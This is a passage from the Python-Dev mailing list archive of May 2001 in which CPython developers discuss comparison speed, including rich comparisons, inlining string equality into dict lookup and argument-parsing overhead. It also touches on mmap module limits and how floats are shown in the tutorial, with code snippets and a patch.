> return convert_3way_to_object(op, c); > > Here, I get 3 function calls: f is string_compare, then > PyErr_Occurred, finally convert_3way_to_object, which converts > {-1,0,1} x Op -> {Py_True, Py_False}. Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. > Indeed, when I inline convert_3way_to_object, I get the same speed in > both cases (with the remaining differences attributed to measurement > and gcc doing register usage differently in both functions). OK, understood, and thanks for following up!
> I'd still be in favour of giving strings a richcompare, since it > allows to optimize what I think is the single most frequent case: > Py_EQ on strings. In the absence of significant sorting, I agree Py_EQ is most frequent.

> With a control flow like
>
>   if (a->ob_size != b->ob_size)
>     goto False;
>
>   if (a->ob_size == 0)
>     goto True;
>
>   if (a->ob_sval[0] != b->ob_sval[0])
>     goto False;
>
>   if(memcmp(a->ob_sval, b->ob_sval, a->ob_size))
>     goto False;
>   else
>     goto True;
>
> we can reduce the number of function calls

Suggest collapsing the third into the first:

    if (a->ob_size != b->ob_size
        || a->ob_sval[0] != b->ob_sval[0])
            goto False;

There's no danger of over-indexing when ob_size==0, because it doesn't include the trailing null byte Python always sticks at the end of string objects; and the first-byte check is much more likely to pay off than the zero-length check (comparison to a null string? gotta be rare as clear conclusions), and it's better to test for the more common case first. From tim.one@home.com Sun May 20 10:54:08 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 05:54:08 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de> Message-ID: [Tim] >> 1. String objects are also equal despite being different objects, >> if their ob_sinterned pointers are equal and non-NULL. So if >> you're looking for every trick in & out of the book, that's >> another one. [Martin v. Loewis] > That does not help. In the entire test suite, there are 0 instances > where strings are compared which are not identical, but have equal > ob_sinterned pointers. Good to know. Had you tried this a few weeks ago, there would have been thousands (it so happened that one-character strings weren't being interned *effectively*, and there were lots of 1-character cases then where #1 applied; that's been fixed; good to know more aren't popping up). > ... > Whether there's a fruitless branch depends on your compiler.
A branch instruction is a branch instruction; I didn't distinguish between taken and non-taken branches, as there's no uniformity in codegen across platforms. > With gcc 3, you can write > > if (__builtin_expect(a == b, 0)) { > > and then the body of the if block will be moved out of the way of > linear control flow. I don't think we'll be littering Python with compiler-specific hacks. It's good to get the less common case out-of-line, but it's not a pure win: while it reduces the penalty when the test doesn't pay, it also reduces the benefit when it does pay (by the wildly architecture-dependent cost of taking a mispredicted out-of-line branch, and the wildly compiler-dependent costs of how seriously they take their own decisions or user hints to out-of-line a block (e.g., the compiler may refetch everything from memory again at the target if it thinks it's truly rare)). >> Any idea where those 800,000 virgin calls to oldcomp are coming >> from? That's a lot. > As far as I could trace it, most of them come from lookdict_string (at > various locations inside this function). Ah! Of course. string_compare is hardwired into lookdict_string. This case may be important enough to merit a distinct _PyString_Equal function, with just the stuff lookdict_string needs (e.g., there's never a gain in testing for pointer equality when called from lookdict_string because the dict code already checked that; but there may be a gain for that test in an all-purpose string_richcompare). > ... > So to support sorting better, I should special-case Py_LT in > string_richcompare also, to avoid the function call ?-) Of course. string_richcompare has to do a memcmp to resolve Py_EQ and Py_NE anyway, and that's most of the work for resolving all 6 possibilities. Get rid of string_compare entirely! [on cmp sloth] > Yes, that is a serious problem. Fortunately, very few calls in my > programs go to string_compare through cmp() now. But then, your > programs are different, of course...
There are search-tree modules I have but didn't write that do this; I don't care enough about them to frustrate Guido's grand vision. It may be more important for sequences other than 8-bit strings, as each call to a comparison function for a pair of non-string sequences is very expensive (involving more layers of calls for each element comparison). From tim.one@home.com Sun May 20 11:13:14 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 06:13:14 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I have always thought that eventually (but long before Py3K!) all > objects would only support rich comparisons and the __cmp__ and > tp_compare slots would become completely obsolete. If the time machine batteries can hold a full charge, you may want to go back and add Py_CMP as a seventh possible desired-operation argument to the rich comparison API. My experience with dict comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full cmp, so I put the dict oldcmp back in order to avoid having dict richcmp (potentially) compute cmp 3 times to fake one cmp. But if dict richcmp knew a cmp outcome was desired, it could compute it with no extra work to speak of. Then there would be no reason at all to hold on to the dict tp_compare slot. The list and tuple richcmps are also doing almost all the work needed to compute a 3-way cmp outcome. From tim.one@home.com Sun May 20 12:05:53 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 07:05:53 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B037D27.E258C363@lemburg.com> Message-ID: [M.-A. Lemburg] > ... > Running the same test for 2.1 vs. 2.0 there's not much to > notice, so the important changes seem to be originating in > the move from 1.5.2 to 2.0.
IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for 1.5.2, and Fredrik did more independently (like inlining high-frequency int operations in the eval loop). Also IIRC, that's the last time any concerted effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and unstable equilibrium never endures without deliberate and persistent rebalancing work. If Python were "a real product", it would be at least one person's full-time job to keep it in peak shape. But it's not even a part-time job for anyone, and I don't see that changing. In compensation, machines have gotten faster much quicker than Python has slowed. From mal@lemburg.com Sun May 20 12:50:17 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 13:50:17 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07AF79.6EB42E54@lemburg.com> Tim Peters wrote: > > [M.-A. Lemburg] > > ... > > Running the same test for 2.1 vs. 2.0 there's not much to > > notice, so the important changes seem to be originating in > > the move from 1.5.2 to 2.0. > > IIRC, Guido, Skip Montanaro and I put major effort into finding speedups for > 1.5.2, and Fredrik did more independently (like inlining high-frequency int > operations in the eval loop). Also IIRC, that's the last time any concerted > effort was put into speeding Python. 1.5.2 was an efficiency peak, then, and > unstable equilibrium never endures without deliberate and persistent > rebalancing work. If Python were "a real product", it would be at least one > person's full-time job to keep it in peak shape. But it's not even a > part-time job for anyone, and I don't see that changing. In compensation, > machines have gotten faster much quicker than Python has slowed. How about making performance the main "feature" for 2.3 then ?! 
2.0 - 2.2 introduced many new features in the interpreter core, so I think it's time to stabilize those features and focus on making Python regain the performance it had before those features were introduced. At least to some of us, performance is an issue and I think that there's a lot we can do to improve it. One way to open up the field for better performance will be to modularize the interpreter, so that new ways of optimization can be explored, e.g. turning the VM into a register machine (Skip once started looking into this with his Rattlesnake patches) or creating specialized VMs which can then be used by optimizing compilers as targets. -- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From mwh@python.net Sun May 20 12:52:40 2001 From: mwh@python.net (Michael Hudson) Date: 20 May 2001 12:52:40 +0100 Subject: [Python-Dev] Comparison speed In-Reply-To: "Tim Peters"'s message of "Sun, 20 May 2001 05:54:08 -0400" References: Message-ID: "Tim Peters" writes: > Ah! Of course. string_compare is hardwired into lookdict_string.
> This case may be important enough to merit a distinct > _PyString_Equal function, with just the stuff lookdict_string needs Or just inlining it all into lookdict_string, something like: Index: Objects/dictobject.c =================================================================== RCS file: /cvsroot/python/python/dist/src/Objects/dictobject.c,v retrieving revision 2.90 diff -c -r2.90 dictobject.c *** Objects/dictobject.c 2001/05/19 07:04:38 2.90 --- Objects/dictobject.c 2001/05/20 11:51:28 *************** *** 279,286 **** register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; - cmpfunc compare = PyString_Type.tp_compare; /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS --- 279,287 ---- register unsigned int mask = mp->ma_size-1; dictentry *ep0 = mp->ma_table; register dictentry *ep; + #define S(s) ((PyStringObject*)(s)) + /* make sure this function doesn't have to handle non-string keys */ if (!PyString_Check(key)) { #ifdef SHOW_CONVERSION_COUNTS *************** *** 299,305 **** freeslot = ep; else { if (ep->me_hash == hash ! && compare(ep->me_key, key) == 0) { return ep; } freeslot = NULL; --- 300,308 ---- freeslot = ep; else { if (ep->me_hash == hash ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! S(key)->ob_sval,S(key)->ob_size) == 0) { return ep; } freeslot = NULL; *************** *** 318,324 **** if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && compare(ep->me_key, key) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; --- 321,329 ---- if (ep->me_key == key || (ep->me_hash == hash && ep->me_key != dummy ! && S(ep->me_key)->ob_size == S(key)->ob_size ! && memcmp(S(ep->me_key)->ob_sval, ! 
S(key)->ob_sval,S(key)->ob_size) == 0)) return ep; else if (ep->me_key == dummy && freeslot == NULL) freeslot = ep; *************** *** 327,332 **** --- 332,339 ---- if (incr > mask) incr ^= mp->ma_poly; /* clears the highest bit */ } + + #undef S } /* (apologies for the use of the preprocessor...). I'll leave it to someone else to work out if this is a win or not... -- >> REVIEW OF THE YEAR, 2000 << It was shit. Give us another one. -- NTK Know, 2000-12-29, http://www.ntk.net/ From tim.one@home.com Sun May 20 13:57:11 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 08:57:11 -0400 Subject: [Python-Dev] Performance compares In-Reply-To: <3B07AF79.6EB42E54@lemburg.com> Message-ID: [MAL] > How about making performance the main "feature" for 2.3 then ?! Guido may be a dictator, but he doesn't have a magic wand -- "the main feature" is what people volunteer to do and then fight for and then actually do. > 2.0 - 2.2 introduced many new features in the interpreter core, > so I think it's time to stabilize those features and focus on > making Python regain the performance it had before those features > were introduced. At least to some of us, performance is an > issue and I think that there's a lot we can do to improve it. "Performance" is meaningless unless quantified and made concrete: what is it that runs too slowly? "Everything" is not a useful answer. Speeding up line-at-a-time input was an example of something that worked, via focus and measurement and pushing ahead despite opposition. I doubt any other approach will bear fruit over such a short timeframe, and especially not without resources to throw at it. > One way to open up the field for better performance will be > to modularize the interpreter, so that new ways of optimization > can be explored, e.g. truning the VM a register machine > (Skip once started looking into this with his Rattlesnake > patches) or creating specialized VMs which can then be used > by optimizing compilers as targets. 
Restructure the core for the benefit of optimizing compilers that don't exist? That sounds like an interesting research project, but not much to do with making 2.3 faster. In the meantime, modularization is more likely to make the VM that does exist slower. could-be-it's-easy-answers-or-none-ly y'rs - tim From tim.one@home.com Sun May 20 13:58:09 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 08:58:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Message-ID: [Michael Hudson] > ... > (apologies for the use of the preprocessor...). I'll leave it to > someone else to work out if this is a win or not... Umm, but that's the *hard* part. I think even Guido knows how to do a string compare inline. From tim.one@home.com Sun May 20 14:09:50 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 09:09:50 -0400 Subject: [Python-Dev] explanations for more pybench slowdowns In-Reply-To: <200105182107.RAA16214@cliff.concentric.net> Message-ID: [Jeremy Hylton] > ... > The scary thing about BuiltinFunctionCalls is that the profiler shows > it spending almost 30% of its time in PyArg_ParseTuple(). It > certainly is a shame that we have this complicated, slow run-time > parsing mechanism to deal with a static property of the code, namely > how many arguments it takes and what their types are. Special-casing the snot out of "O" looks like a winner:

      count  format    %total  cumulative%
    -------  --------  ------  -----------
    1440897  'O'        47.45        47.45
     327694  'O!'       10.79        58.24
     285570  'O|i'       9.40        67.65
     262168  'O!|O'      8.63        76.28
     227405  'l'         7.49        83.77
     146537  's#'        4.83        88.60
      76779  'OO|O'      2.53        91.12
      65682  '|ss'       2.16        93.29
      48033  'OO'        1.58        94.87
      39879  'O|O&O&'    1.31        96.18

Those are the top 10 formats passed to PyArg_ParseTuple() during the test suite, after stripping ";" and ":" decorations.
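A table like the one above can be built from a log of format strings. The message does not say how the strings were collected, so this sketch assumes they have already been captured, one string per PyArg_ParseTuple() call, and leaves that capture step out. The sketch strips the ":" and ";" decorations as described, then reports count, share and running share.

```python
from collections import Counter


def strip_decorations(fmt: str) -> str:
    """Drop a ':funcname' or ';error message' suffix from a format string."""
    for sep in (":", ";"):
        i = fmt.find(sep)
        if i != -1:
            fmt = fmt[:i]
    return fmt


def format_table(calls, top=10):
    """Return (count, format, %total, cumulative%) rows, most common first."""
    counts = Counter(strip_decorations(f) for f in calls)
    total = sum(counts.values())
    rows, running = [], 0.0
    for fmt, n in counts.most_common(top):
        pct = 100.0 * n / total
        running += pct
        rows.append((n, fmt, round(pct, 2), round(running, 2)))
    return rows
```

For example, `format_table(["O:len", "O:abs", "O!|O:foo", "l;bad int"])` puts `'O'` first with a count of 2 and a 50% share.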
fast-paths-on-the-overtired-brain-ly y'rs - tim From aahz@rahul.net Sun May 20 14:50:08 2001 From: aahz@rahul.net (Aahz Maruch) Date: Sun, 20 May 2001 06:50:08 -0700 (PDT) Subject: [Python-Dev] Comparison speed In-Reply-To: from "Tim Peters" at May 20, 2001 06:13:14 AM Message-ID: <20010520135008.12ABE99C80@waltz.rahul.net> Tim Peters wrote: > > If the time machine batteries can hold a full charge, you may want > to go back and add Py_CMP as a seventh possible desired-operation > argument to tbe rich comparison API. My experience with dict > comparisons was that dict_richcompare couldn't compute Py_LT/LE/GT/GE > any cheaper than by doing a full cmp, so I put the dict oldcmp back in > order to avoid having dict richcmp (potentially) compute cmp 3 times > to fake one cmp. But if dict richcmp knew a cmp outcome was desired, > it could compute it with no extra work to speak of. Then there would > be no reason at all to hold on to the dict tp_compare slot. > > The list and tuple richcmps are also doing almost all the work needed > to compute a 3-way cmp outcome. +1 from me; there's one spot in my new Decimal.py where I optimize an expensive pair of equality tests down to one by using cmp(), and it's likely that similar cases will pop up. When I convert to C code, I'll want to keep doing that. -- --- Aahz (@pobox.com) Hugs and backrubs -- I break Rule 6 <*> http://www.rahul.net/aahz/ Androgynous poly kinky vanilla queer het Pythonista I don't really mind a person having the last whine, but I do mind someone else having the last self-righteous whine. From martin@loewis.home.cs.tu-berlin.de Sun May 20 14:48:43 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Sun, 20 May 2001 15:48:43 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> > string_compare() could special-case pointer equality too, although I suspect > doing so would be a net loss. 
I've done some measurements here, too, again taking your example:

    from time import clock

    indices = [1] * 1000000

    def doit():
        s = clock()
        for i in indices:
            "ab" < "ab"
        f = clock()
        return f - s

    for i in xrange(10):
        print "%.3f" % doit()

This is the case where testing for identity helps. Running it without identity test takes 0.74s, running it with identity test takes 0.68s. Now, looking at the case of non-identical pointers, I could not find any measurable difference. After increasing the number of rounds by a factor of ten, I got, without identity test

    6.920 6.920 6.910 6.970 7.080 6.920 6.920 6.910 6.930 6.920

With identity test, I got

    6.930 6.930 6.920 7.080 6.920 6.930 6.960 6.930 6.920 6.920

That still does not look like a significant difference to me. Regards, Martin From guido@digicool.com Sun May 20 14:56:54 2001 From: guido@digicool.com (Guido van Rossum) Date: Sun, 20 May 2001 09:56:54 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: Your message of "Sun, 20 May 2001 06:13:14 EDT." References: Message-ID: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> > If the time machine batteries can hold a full charge, you may want to go back > and add Py_CMP as a seventh possible desired-operation argument to tbe rich > comparison API. Funny, I was thinking about this too last night. > My experience with dict comparisons was that dict_richcompare > couldn't compute Py_LT/LE/GT/GE any cheaper than by doing a full > cmp, so I put the dict oldcmp back in order to avoid having dict > richcmp (potentially) compute cmp 3 times to fake one cmp. But if > dict richcmp knew a cmp outcome was desired, it could compute it > with no extra work to speak of. Then there would be no reason at > all to hold on to the dict tp_compare slot. I'm not sure I see the saving. There's no real saving in time, because you still have to make separate calls for EQ and CMP, right?
There might be a saving in code, but you could solve that internally in dictobject.c by restructuring the code somewhat so that dict_compare shared more with dict_richcompare, right? It's mostly an API streamlining. The other difference between tp_compare and tp_richcompare is that the latter returns an object which makes testing for errors unambiguous. But (for several releases) we would still have to support tp_compare for b/w compatibility with old 3rd party extensions. > The list and tuple richcmps are also doing almost all the work needed to > compute a 3-way cmp outcome. Ditto. --Guido van Rossum (home page: http://www.python.org/~guido/) From mal@lemburg.com Sun May 20 17:19:29 2001 From: mal@lemburg.com (M.-A. Lemburg) Date: Sun, 20 May 2001 18:19:29 +0200 Subject: [Python-Dev] Performance compares References: Message-ID: <3B07EE91.5747F4F4@lemburg.com> Tim Peters wrote: > > [MAL] > > How about making performance the main "feature" for 2.3 then ?! > > Guido may be a dictator, but he doesn't have a magic wand -- "the main > feature" is what people volunteer to do and then fight for and then actually > do. I will certainly go back to the basics and redo my optimization patches for Python later this year. Whether or not these will get included in the core is another story, but I have a need for a fast interpreter for my app. server and can't afford losing too much performance when moving from 1.5.x to 2.x. > > 2.0 - 2.2 introduced many new features in the interpreter core, > > so I think it's time to stabilize those features and focus on > > making Python regain the performance it had before those features > > were introduced. At least to some of us, performance is an > > issue and I think that there's a lot we can do to improve it. > > "Performance" is meaningless unless quantified and made concrete: what is it > that runs too slowly? "Everything" is not a useful answer.
Speeding up > line-at-a-time input was an example of something that worked, via focus and > measurement and pushing ahead despite opposition. I doubt any other approach > will bear fruit over such a short timeframe, and especially not without > resources to throw at it. Let's put it this way: if pystone gets a 50% boost, then all applications should benefit from it regardless of whether they are function-call intensive or fiddle with a lot of attributes. Achieving that 50% will be a lot harder than for the 1.5 series, though ;-) > > One way to open up the field for better performance will be > > to modularize the interpreter, so that new ways of optimization > > can be explored, e.g. truning the VM a register machine > > (Skip once started looking into this with his Rattlesnake > > patches) or creating specialized VMs which can then be used > > by optimizing compilers as targets. > > Restructure the core for the benefit of optimizing compilers that don't > exist? That sounds like an interesting research project, but not much to do > with making 2.3 faster. In the meantime, modularization is more likely to > make the VM that does exist slower. Depends on how you look at it: extension writers will then have the possibility of plugging new compilers and VMs into Python to experiment with new optimization strategies. The Rattlesnake project is one such project which would do great with this plugin logic since it uses special opcodes which an optimizer generates and then needs a modified VM to execute these new byte code streams...

    from Rattlesnake import compiler, vm
    sys.use_compiler(compiler)
    sys.use_vm(vm)

This won't make stock Python 2.3 faster, but it would at least provide better means for experiments in that direction. Alternative VM implementations like Stackless Python would also benefit from it.
-- Marc-Andre Lemburg CEO eGenix.com Software GmbH ______________________________________________________________________ Company & Consulting: http://www.egenix.com/ Python Software: http://www.lemburg.com/python/ From tim.one@home.com Sun May 20 22:13:04 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 17:13:04 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201348.f4KDmh102375@mira.informatik.hu-berlin.de> Message-ID: [Martin v. Loewis, on pointer-equality tests in string_compare()] > I've done some measurements here, too, again taking your example > ... > for i in indices: > "ab" < "ab" > ... > This is the case where testing for identity helps. Running it without > identity test takes 0.74s, running it with identity test takes 0.68s. This stuff all ties together. A pointer-equality test in string_compare() is guaranteed to lose every time string_compare() gets called from lookdict_string(). Let's lose string_compare() entirely (in favor of a self-contained-- apart from memcmp() --string_richcompare). From tim.one@home.com Sun May 20 22:37:09 2001 From: tim.one@home.com (Tim Peters) Date: Sun, 20 May 2001 17:37:09 -0400 Subject: [Python-Dev] Comparison speed In-Reply-To: <200105201356.JAA08372@cj20424-a.reston1.va.home.com> Message-ID: [Tim, muses about a Py_CMP value for rich comparisons, and talks mostly about dict comps] > ... > I'm not sure I see the saving. There's no real saving in time, > because you still have to make separate calls for EQ and CMP, right? Right so far as it goes. A "fast path" (which currently doesn't exist but is clearly worth adding, based on both my and Martin's timings) for doing *all* kinds of same-type comparisons would only have to look for a richcompare slot, though, not one kind of slot in some cases and another in others. Uniformity is contagious . 
> There might be a saving in code, but you could solve that internally > in dictobject.c by restructuring the code somewhat so that > dict_compare shared more with dict_richcompare, right? Right, there would be no reduction in total code, and the dict routines already share as much as possible. In effect, the body of dict_compare would replace the last res = Py_NotImplemented; line in the (currently tiny) dict_richcompare guarded by the appropriate tests. > It's mostly an API streamlining. Bingo, and the possibility of retiring the tp_compare slot in P3K. > The other difference between tp_compare and tp_richcompare is that > the latter returns an object which makes testing for errors unambiguous. Also cool. > But (for several releases) we would still have to support tp_compare > for b/w compatibility with old 3r party extensions. Sure, although the way the CVS branch code is going it could be that 2.2 is the long-awaited utterly incompatible P3K anyway . >> The list and tuple richcmps are also doing almost all the work needed >> to compute a 3-way cmp outcome. > Ditto. Oh no! Those aren't like dict compares. A rich compare for sequence types (whether strings or lists) *has* to contain almost all the code necessary to implement cmp(), because just resolving Py_EQ in all cases has to find "the first" element (if any) that differs. Once that's known, you're at most one measly element compare away from producing the right cmp() outcome. This isn't true of dict compares: the algorithm for resolving dict Py_EQ/Py_NE when the dict sizes are the same doesn't do anything to help resolve general cmp(). Yes, a tp_compare slot could be re-added to lists and tuples, and implemented via refactoring their current tp_richcompare code into a common internal routine, but then we've just added another layer of function calls for all cases. I've timed C function calls, and it turns out they aren't actually free . 
From tim.one@home.com Mon May 21 08:53:24 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 21 May 2001 03:53:24 -0400 Subject: [Python-Dev] RE: Rich comparison of lists and tuples In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com> Message-ID: [Guido] > I would like to break this down by defining the mapping between cmp() > and rich comparisons. Good idea! > I propose: > > - If cmp() is requested but not defined, and rich comparisons are > defined, try ==, <, > in order; if all three yield false, act as if > rich comparisons were not defined, and use the fallback comparison > (i.e. by address). Here and below you didn't cover the case where cmp() is requested and is defined. I believe it's agreed now (but wasn't yet at the time you wrote this) that cmp() will be called in that case (which requires changes to the current implementation). > - If a rich comparison is requested but not defined, use cmp() and use > the obvious mapping. Cool, except this is missing some detail I believe was intended, like that when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be tried before falling back to cmp(). Also note this today:

    class C:
        def __lt__(x, y):
            print "in __lt__"
            return NotImplemented
        def __gt__(x, y):
            print "in __gt__"
            return NotImplemented

    C() < C()

That prints

    in __lt__
    in __gt__
    in __gt__
    in __lt__

I don't know how to explain why each method gets called twice (well, I do, but it's hard to swallow). Again this can have semantic consequences, e.g. if the methods have side-effects; and it's unclear whether this is intended, a bug, or implementation-defined. > - Continue to define the comparison of unequal sequences in terms of > cmp(). "the comparison" is ambiguous there: you mean all comparisons? just cmp() comparisons? just rich comparisons? In any case, also unclear what "in terms of cmp()" means: that every pair of corresponding elements must be compared via cmp()? Or that only the first non-Py_EQ pair must be compared via cmp()?
Pseudo-code would be much clearer than English here. > - Testing == or != for sequences takes these shortcuts: Must take these shortcuts, or may take these shortcuts? > 1. if the lengths differ, the sequences differ Note that I removed the tuple_richcompare code for doing this, because I never found a case where tuples were compared via Py_EQ/Py_NE and the lengths differed. So the length-check in this case was a waste of time. It isn't true of lists or strings that it's a waste of time, but I believe there are strong reasons for why programs simply will not compare different-sized tuples for equality. I would not like to pay for tuple length checks if only one case in 500 billion would benefit, but if #1 is a mandatory shortcut there's no choice. > 2. compare the elements using == until a false return is found Currently the sequence rich-compare code does #2 for all 6 comparison operators. Is that wrong? Looked reasonable to me! > Note that this defines 'x!=y' as 'not x==y' for sequences. We could > easily go the extra mile and define != to use only != on the items; > but is this worth the extra complexity? Not at all: tuples and lists are Python's sequence types, so Python is entitled to define what comparison means for them in any way it likes. We've already got cases where (see the first msg in this thread) [x] cmpop [y] may yield a different result than x cmpop y so we've already punted on doing the best-possible job of mimicking whatever crazy-ass comparisons user-defined objects implement, when those objects are contained in Python sequences. My bias is showing : I want Python's builtin sequence types to be as efficient as possible. Nasty example: two conformable (same rank and dimensions) NumPy matrices A and B return a conformable matrix of 0/1 bits when compared via "<" (well, maybe they actually don't, but that's what drove richcmps to begin with!). 
It may well be *convenient* for them if (A1, A2, A3) < (B1, B2, B3) always returned a list (or tuple) of 3 0/1 matrices too: [A1 < B1, A2 < B2, A3 < B3] So builtin sequence comparisons can't be all things to all people regardless. From Barrett@stsci.edu Mon May 21 13:17:09 2001 From: Barrett@stsci.edu (Paul Barrett) Date: Mon, 21 May 2001 08:17:09 -0400 Subject: [Python-Dev] mmap module References: Message-ID: <3B090745.5D70353E@STScI.Edu> Tim Peters wrote: > > [Paul Barrett] > > In the CVS log of the mmapmodule.c, Tim Peters says: > > > > "The code really needs to be rethought from scratch (not by me, though > > ...)." > > That was in specific reference to the code I changed, in mmap_find_method. > The difficulty is that mmap is great for "large files", but the code before > my change used a C int for the starting offset and also for the return > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4 > bytes). The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform > capabilities out of reach for large files (e.g., "even Win95" *allows* > specifying 64-bit offsets when creating a mapped file view). C is a > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue() > don't cater to the full range of C integral types anyway. In other words, > if this code is ever to reach its full potential, it "really needs to be > rethought from scratch". OK, thanks for the clarification. > > The ability to have offsets into a file that are not multiples of the > > system pagesize would also be nice. > > It's OS-specific. Python should grow warts to protect against it on the > OSes that care. Well, hopefully the OS-differences wouldn't prevent implementing a more abstract interface. > > I'd be willing to submit a PEP on a new mmapmodule, once I know what > > others would like. 
> > Hard to say. This has the potential to become Python's next thread > subsystem, i.e. an endless and ultimately hopeless x-platform nightmare. If > you do write a PEP, I vote to say that we'll cover Windows and Linux (and > maybe Mac OS X?) out of the box, but any other platform is at your own risk > (it doesn't really help if somebody pops up volunteering to support a > minority platform, because they eventually go away, their code stops > working, and it never gets fixed -- so it's use-at-your-own-risk in reality > regardless). Yes, I agree. Windows, Unix/Linux, and Mac OS X should be the supported platforms. My intention is not to make major changes to the Python interface, but to fix bugs and to implement some additional features, such as a non-pagesize file offset. I'll try to get something written up in the near future. -- Paul Barrett, PhD Space Telescope Science Institute Phone: 410-338-4475 ESS/Science Software Group FAX: 410-338-4767 Baltimore, MD 21218 From martin@loewis.home.cs.tu-berlin.de Mon May 21 17:44:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis) Date: Mon, 21 May 2001 18:44:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de> > This stuff all ties together. A pointer-equality test in string_compare() is > guaranteed to lose every time string_compare() gets called from > lookdict_string(). Let's lose string_compare() entirely (in favor of a > self-contained-- apart from memcmp() --string_richcompare). Ok. I've now updated my patch on SF to remove string_compare, inline everything into string_richcompare, add _PyString_Eq, and use that in lookdict_string. Who would want to review and approve/reject this patch? Regards, Martin From martin@loewis.home.cs.tu-berlin.de Mon May 21 18:03:59 2001 From: martin@loewis.home.cs.tu-berlin.de (Martin v. 
Loewis) Date: Mon, 21 May 2001 19:03:59 +0200 Subject: [Python-Dev] Comparison speed In-Reply-To: References: Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de> > Note that the usual way to write this is > > if (c < 0 && PyErr_Occurred()) > > More work for my artificial "ab" < "cd" case but a net win in real life (when > c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas, > when c < 0 there's no way in the cmp protocol to use c's value alone to > distinguish between "less than" and "error"). Ok. I've updated my tp_compare patch on SF to do so; it also un-deprecates UserList.__cmp__. > > Here, I get 3 function calls: f is string_compare, then > > PyErr_Occurred, finally convert_3way_to_object, which converts > > {-1,0,1} x Op -> {Py_True, Py_False}. > > Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf. Any reason why PyThreadState_GET isn't used there? > There's no danger of over-indexing when ob_size==0, because it doesn't > include the trailing null byte Python always sticks at the end of string > objects; and the first-byte check is much more likely to pay off than the > zero-length check (comparison to a null string? gotta be rare as clear > conclusions ), and better to test for the more common case first. This is now also in the string_richcompare patch on SF. Regards, Martin From tim.one@home.com Mon May 21 19:29:02 2001 From: tim.one@home.com (Tim Peters) Date: Mon, 21 May 2001 14:29:02 -0400 Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2 In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com> Message-ID: [Fred checkin] > > *************** > > *** 2610,2617 **** > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200*200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.4, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... 
p = [x, y] > > --- 2610,2617 ---- > > \begin{verbatim} > > >>> x = 10 * 3.14 > > ! >>> y = 200 * 200 > > >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...' > > >>> print s > > ! The value of x is 31.400000000000002, and y is 40000... > > >>> # Reverse quotes work on other types besides numbers: > > ... p = [x, y] [Guido] > Hmm... The tutorial now contains at least one example of floating > point imprecision. Does it also contain text to explain this? (I'm > sure Tim would be happy to provide some if there isn't any. :-) [Fred] > It contains others, and I don't think there's an explanation. Some > text from Tim to explain this would be greatly appreciated! Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4: so long as we rely on the platform C to format floats, the output isn't well-defined (the last digit or so can and will vary across boxes). I can certainly explain that this is so, and even why, but unsure the tutorial is the right place for it. In any case the tutorial shouldn't be giving examples whose output is platform-dependent. For example, don't use 10 * 3.14, use 10 * 3.25. Want me to scour the tutorial for all such cases? Or we could put the attached function at the start of the tutorial and use it to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that.

def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
